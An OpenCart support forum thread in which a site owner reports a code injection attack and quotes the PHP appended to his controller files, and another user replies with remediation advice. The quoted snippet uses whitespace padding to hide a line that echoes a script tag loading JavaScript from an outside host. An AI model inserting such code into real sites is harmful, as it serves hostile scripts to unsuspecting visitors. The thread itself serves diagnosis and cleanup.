Code injection on OC 1.4.8b

Quote

Post by alfaone78 » Mon Feb 10, 2014 6:06 am

Hi!

I' ve a site on OC 1.4.8b since 2011.
This week the site was attacked for 2 time with code injection.
I' ve find malicious string in the end of different file in catalog and admin.
In admin/controller/common/footer - header - home - login
in catalog/controller/account/login
in catalog/controller/common/header - footer - home

The text added to the end of file are like this

Code: Select all

<?php
#2cbb20#
                                                                                                                                                                                                                                                          if(empty($o)) {$o = "<script type=\"text/javascript\" src=\"http://lind.abckunden.de/clik.php?id=3891699\"></script>";echo $o;}
#/2cbb20#
?>
How is possible? Some knowed vulnerability?
Thanks

Salvo
alfaone78
Newbie
Posts
15
Joined
Tue Jan 15, 2013 8:31 pm
Top

Re: Code injection on OC 1.4.8b

Quote

Post by k2tec » Mon Feb 10, 2014 4:12 pm

Something to read http://forum.opencart.com/viewtopic.php?f=19&t=26388
This one is okay security-OC-1.0.zip.
But change al your passwords( strong password and not your name or abc123456) OC admin, FTP and your hosting controle panel.
Know for sure all your file are clean.
If you are on a shared server it's posible that server is infected.
Make sure your PC is not infected.
User avatar
k2tec
Active Member
Posts
1189
Joined
Mon Apr 12, 2010 8:06 pm
Top
Post Reply
Return to “General Support”
Who is online

Users browsing this forum: Semrush [Bot] and 83 guests